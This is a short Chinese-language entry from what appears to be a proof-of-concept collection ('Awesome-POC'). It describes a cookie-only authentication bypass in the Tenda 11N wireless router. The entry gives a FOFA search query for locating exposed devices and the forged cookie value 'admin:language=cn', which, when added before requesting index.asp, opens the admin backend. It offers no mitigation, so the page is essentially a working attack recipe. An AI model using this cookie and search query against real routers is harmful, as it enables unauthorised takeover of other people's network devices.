Awesome-POC/网络设备漏洞/Tenda 11N无线路由器 Cookie 越权访问漏洞.md
2022-05-19 18:49:40 +08:00

588 B
Raw Blame History

Tenda 11N无线路由器 Cookie 越权访问漏洞

漏洞描述

Tenda 11N无线路由器由于只验证Cookie导致任意用户伪造Cookie即可进入后台

漏洞影响

Tenda 11N无线路由器

FOFA

app="TENDA-11N无线路由器"

漏洞复现

登录页面

image-20220519180949727

添加Cookie, 访问 index.asp 进入后台

admin:language=cn

image-20220519181248549